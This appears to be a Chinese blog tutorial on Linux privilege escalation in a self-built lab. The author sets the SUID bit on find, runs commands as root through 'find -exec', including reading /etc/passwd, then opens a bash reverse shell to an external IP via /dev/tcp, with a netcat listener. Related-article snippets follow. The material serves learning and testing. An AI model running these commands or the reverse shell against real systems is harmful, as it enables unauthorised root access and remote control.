suid提权的环境搭建+反弹shell

于 2024-09-11 17:11:54 发布
阅读量235 收藏 2
点赞数 5
文章标签: 服务器 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/142145165
版权

在这里插入图片描述
SUID(Set User ID)是一种特殊的文件权限设置,它允许文件在执行时具有文件所有者的权限。当具有SUID权限的文件被执行时,执行该文件的用户会暂时获得文件所有者的权限。这种权限通常用于需要高权限操作的程序,如‌passwd、‌sudo等。SUID权限仅对可执行文件有效,且在文件执行结束后,用户的权限会恢复到原来的状态。

1.环境搭建

# 查看find位置
which find

image-20240911150905579

# 查看find权限
 ls -al /usr/bin/find

image-20240911151051809

# 查看具有suid权限的文件,发现没有find文件
find / -perm -u=s -type f 2>/dev/null

image-20240911151207886

# 切换到root用户,赋予find文件suid权限
chmod u+s /usr/bin/find

image-20240911151343255

2.提权

# 再次使用find命令查看具有suid权限的文件,发现有find文件
find / -perm -u=s -type f 2>/dev/null

image-20240911151506129

# 使用find命令提权,发现是用root权限执行的whoami命令
find `which find` -exec whoami \;

find `which find` -exec ls \;

find `which find` -exec cat /etc/passwd \;

# 命令解释: 以find 命令 执行  whoami 命令。   
# find  (一个路径或文件必须存在)  -exec  执行命令 (结束)\;

image-20240911151754320

3.反弹shell

# 开启监听
nc -lvvnp 6666

image-20240911152019767

# 执行反弹shell命令
find /etc/passwd -exec bash -ip >& /dev/tcp/59.110.216.246/6666 0>&1 \;

b6220a16df5bc3cc6c5743cac4dba5f
好小子,离成功又进一步!!!

蚂蚱.top
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux使用suid vim.basic文件实现提权
09-14
这种方式在安全环境中是不允许的,但在渗透测试或漏洞分析中,了解这种提权方法有助于提升网络安全意识和防护能力。当然,对于系统管理员来说,定期检查和限制不必要的SUID文件是防范此类攻击的重要措施。
反弹shell的几种获取方式.docx
最新发布
08-19
一、反弹shell 二、python pty 方式 三、suid提权的方式 1、 suid权限的设置 2、 找出系统中具有suid权限的命令 3、 find提权 四、sessions的使用方法
Linux提权扫描脚本
04-28
1. **确定目标**:明确要检测的提权漏洞类型,如SUID/SGID、权限配置错误等。 2. **编写检测代码**:根据目标漏洞编写相应的检测逻辑,如检查文件权限、进程属性等。 3. **漏洞验证**:编写验证代码,确保检测到的...
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux提权手法总结以及 Linux提权exp集合
02-22
其次,SUID(Set-User-ID)程序提权是另一种常见的提权方式。SUID允许非特权用户以程序所有者的身份执行该程序,这在某些场景下是必要的,但也可能被恶意利用。例如,`passwd`、`sudo`等程序通常具有SUID权限,攻击...
linux提权总结8大类型,30多种方式
09-27
这些方法涵盖了内核提权、服务提权、sudo提权suid提权、sgid提权、定时任务提权和nfs提权等。 1. **内核提权** - 内核提权通常涉及利用内核中的漏洞来获得更高的权限。一种常见的方法是通过所谓的“脏牛”漏洞...
windows&linux;提权总结
04-24
- 对Linux系统中SUID/SGID位的滥用、内核漏洞、配置文件错误等技术的掌握。 需要注意的是,这些信息和方法不应被用于非法目的。在现实世界中,企业和组织应当采取适当的防御措施来预防未授权的权限提升,这可能包括...
部分渗透提权文章
04-16
5. **提权实例**:在实际操作中,提权可能涉及多种技术,如利用SUID/SGID权限的程序,滥用sudo权限,或者通过系统服务漏洞进行提权。例如,CVE-2016-5195(Dirty COW)是一个著名的Linux内核漏洞,攻击者可以利用它...
Linux下非交互式提权详解
09-15
在无法反弹shell的情况下,这种方法尤为实用,因为它允许在没有交互环境的情况下运行提权工具并检查结果。 首先,文章中提到了一个简单的PHP脚本`proce_open()`,这个脚本接收两个参数:提权工具的绝对路径和需要...
red hat5提权
04-10
它可能包括了命令行指令、漏洞描述、环境变量设置等信息,对于理解提权过程至关重要。用户应该仔细阅读这份文档,结合视频教程和脚本,全面了解Red Hat 5的提权机制。 在实际操作中,提权通常分为本地提权和远程提...
【PwnKit】CVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在...1.解压提权脚本 2.执行make 3.执行./cve-2021-4034
linux提权代码
06-04
2. **环境变量利用**:恶意用户可能通过修改环境变量来触发提权,例如修改`LD_PRELOAD`来加载恶意库,或通过`PATH`变量重定向系统命令。 3. **服务漏洞**:很多系统服务默认运行在root权限下,如果存在安全漏洞,...
webshell提权教程
06-12
例如,通过执行系统命令、修改环境变量、利用SUID/SGID程序等方式。 三、提权技巧与方法 1. 检测与利用系统漏洞:查找并利用服务器存在的安全漏洞,如缓冲区溢出、格式化字符串漏洞、权限泄露等,以获得更高级别的...
Ubuntu 10.10 提权教程
02-10
对于系统管理员来说,定期更新系统、打补丁、严格控制SUID/SGID程序的使用以及监控系统日志都是防止提权攻击的重要措施。 总之,Ubuntu 10.10提权教程涵盖了系统安全中的重要主题,理解和掌握这些知识对于保护个人...
LINUX与UNIX+SHELL编程指南
05-21
第14章 环境和shell变量 132 14.1 什么是shell变量 132 14.2 本地变量 132 14.2.1 显示变量 133 14.2.2 清除变量 133 14.2.3 显示所有本地shell变量 133 14.2.4 结合变量值 134 14.2.5 测试变量是否已经设置 134 ...
Linux溢出提权教程
03-08
1. 利用SUID/SGID程序:SUID和SGID位允许程序以文件所有者的权限运行,攻击者可能会尝试利用这些程序的漏洞进行提权。 2. 检查系统日志:通过查看/var/log/secure等日志文件,可以发现异常活动。 3. 防范措施:更新...
红队测试之Linux提权小结1
08-03
提权背景】 在计算机安全领域,权限提升(提权)是指用户通过特定手段获取原本不允许其使用的更高权限。例如,一个普通用户利用某些漏洞或技巧,将自己升级为管理员用户,或者利用操作系统或软件应用程序中的错误...
LINUX编程基础Shell编程篇
09-09
LINUX编程基础Shell编程篇 Shell编程是Linux编程基础中的一部分,它允许用户通过编写脚本来自动执行复杂的任务。在本节中,我们将学习如何编写Shell脚本,如何赋值和引用变量,如何使用流程控制语句,如何使用IF...
curl 的suid 提权
09-13
对于 curl 的 suid 提权,我可以给你一些建议,但是请注意使用 suid 提权可能存在安全风险,需要谨慎操作。 Suid 权限是一种权限设置,允许普通用户在执行特定可执行文件时以文件所有者的权限运行它。这种设置通常用于提供普通用户对某些特权操作的临时访问权限。 要实现 curl 的 suid 提权,你可以按照以下步骤进行操作: 1. 创建一个新的 shell 脚本,比如 "curl_suid.sh"。 2. 在脚本中,设置需要执行的 curl 命令,比如 `#!/bin/sh \ncurl <your curl command>`。 3. 将该脚本的所有者设置为 root,并将 suid 位设置为可执行。可以使用以下命令进行设置: ``` $ sudo chown root:root curl_suid.sh $ sudo chmod 4755 curl_suid.sh ``` 请注意,这种设置可能会引起系统安全问题,因此建议你仔细评估风险并确保只有可信用户可以访问该脚本。 此外,还有其他提权方法和技术,但出于安全考虑,我无法提供更多细节。如果你需要更深入的了解,请查阅相关资料或咨询专业人士。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值